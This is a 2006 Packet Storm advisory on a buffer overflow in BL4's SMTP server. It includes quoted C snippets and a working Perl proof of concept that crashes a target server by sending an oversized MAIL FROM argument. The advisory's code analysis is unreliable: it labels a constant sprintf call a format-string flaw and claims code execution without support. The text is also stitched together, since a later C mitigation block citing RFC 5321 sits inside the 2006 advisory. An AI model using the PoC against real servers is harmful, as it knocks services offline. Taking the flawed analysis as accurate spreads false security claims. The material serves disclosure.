BL4-smtp.txt

2006-04-29T00:00:00
ID PACKETSTORM:45925
Type packetstorm
Reporter the_day
Modified 2006-04-29T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------  
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable  
---------------------------------------------------------------------------  
  
Author : Dedi Dwianto  
Date : April, 27th 2006  
Location : Indonesia, Jakarta  
Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt  
Critical Lvl : High  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Application : BL4's SMTP server  
version : < 0.1.5  
URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0  
Description :  
  
BL4's SMTP server is an inbound only SMTP server.  
It currently uses hardcoded values for handling email.   
The SMTP server puts the incoming email into various text files.  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~~  
BL4's SMTP server is prone to a flaw that allows a remote attacker to
cause a denial of service or execute arbitrary code.
The vulnerability is due to a buffer overflow in the SMTP service.
A remote attacker can repeatedly send more than 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.
  
------------------think.c-----------------------------------
...........
    {
        slaveEmail[x]->isData = 0;
        slaveEmail[x]->emailFrom = 0;
        slaveEmail[x]->emailTo = 0;
        free(buffer);
        buffer = malloc(sizeof(char) * 12);   /* 12-byte reply buffer */
        sprintf(buffer, "250 OK\r\n");
        return buffer;
    }
    free(buffer);
.............
    slaveEmail[x]->EHLO = buffer;
    slaveEmail[x]->EHLOtrue = 1;

    buffer = malloc(sizeof(char) * 12);       /* 12-byte reply buffer */
    sprintf(buffer, "250 OK\r\n");
    return buffer;
-----------------------------------------------------------
--
sprintf(buffer, "250 OK\r\n");
--
Vulnerable to format string attacks.

--
free(buffer);
buffer = malloc(sizeof(char) * 12);
--
Vulnerable to buffer overflow.
An attacker can execute arbitrary code here.
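A bounded way of handling these command arguments, added here to illustrate the mitigation; this is not BL4's source. The argument length is checked before anything is copied, every reply is a constant string (no formatted data reaches sprintf), and the 2048-byte limit is an assumed policy value chosen below the 2100-byte crash threshold quoted above; the verb list, buffer names and test input are constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define MAX_ARG 2048   /* assumed policy limit, below the advisory's 2100-byte crash point */

/* Verbs the advisory names; EHLO is included because the PoC sends it. */
static const char *const verbs[] = { "HELO", "EHLO", "MAIL FROM:", "RCPT TO:" };

/* Last accepted argument: always NUL-terminated, never more than MAX_ARG bytes. */
char last_arg[MAX_ARG + 1];

/* Parses one SMTP command line and returns a constant reply string.
 * The argument is copied only after its length has been checked, so an
 * oversized line is refused with 501 instead of being written past a buffer. */
const char *handle_command(const char *line)
{
    size_t len = strlen(line);
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                     /* strip CRLF */
    for (size_t i = 0; i < sizeof verbs / sizeof verbs[0]; i++) {
        size_t vlen = strlen(verbs[i]);
        if (len < vlen || strncasecmp(line, verbs[i], vlen) != 0)
            continue;
        const char *arg = line + vlen;
        size_t alen = len - vlen;
        while (alen > 0 && *arg == ' ') { arg++; alen--; }  /* skip blanks */
        if (alen == 0)      return "501 Syntax error: argument required\r\n";
        if (alen > MAX_ARG) return "501 Syntax error: argument too long\r\n";
        memcpy(last_arg, arg, alen);               /* bounded: alen <= MAX_ARG */
        last_arg[alen] = '\0';
        return "250 OK\r\n";
    }
    return "500 Syntax error: command unrecognized\r\n";
}

/* Builds "<verb> " + n 'A's + CRLF: constructed test input, not real traffic. */
char *make_line(const char *verb, size_t n)
{
    size_t vlen = strlen(verb);
    char *buf = malloc(vlen + 1 + n + 3);
    if (!buf) { perror("malloc"); exit(1); }
    memcpy(buf, verb, vlen);
    buf[vlen] = ' ';
    memset(buf + vlen + 1, 'A', n);
    memcpy(buf + vlen + 1 + n, "\r\n", 3);
    return buf;
}

int main(void)
{
    char *ok = make_line("MAIL FROM:", 20), *bad = make_line("MAIL FROM:", 2100);
    printf("%s%s", handle_command(ok), handle_command(bad));  /* 250 OK, then 501 too long */
    free(ok); free(bad);
    return 0;
}
```

RFC 5321 caps a command line at 512 octets including CRLF, so a production server would use a tighter bound than the one assumed here.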
  
  
Poc:  
~~~~~~~~~~~~  
  
#!/usr/bin/perl
# BL4's SMTP server remote DoS PoC: sends an oversized MAIL FROM argument.
use strict;
use warnings;
use IO::Socket::INET;

usage() if @ARGV < 1 or @ARGV > 2;

my $adr = $ARGV[0];
my $prt = defined $ARGV[1] ? $ARGV[1] : "25";   # port defaults to 25

my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $adr,
    PeerPort => $prt, Reuse => 1) or die "Error: can't connect to $adr:$prt\n";

print " -- Connecting To SMTP server at $adr port $prt ... \n";
sleep(1);

print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";
sleep(1);

# 4600 x "jessy" = 23000 bytes, well past the 2100-byte limit noted above
print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";
sleep(1);

printf("[+]Ok!\n");
printf("[+]Crash service.....\n");
printf("[~]Done.\n");

close($socket);

sub usage {
    print "\n=========================================\r\n";
    print " BL4's SMTP server Remote DOS \r\n";
    print "=========================================\r\n";
    print " Bug Found by Dedi Dwianto \r\n";
    print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
    print " Echo Security Research Group \r\n";
    print "=========================================\r\n";
    print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
    exit();
}
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~~  
  
~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous  
~ newbie_hacker@yahoogroups.com  
~ #aikmel #e-c-h-o @irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id  
Homepage: http://theday.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  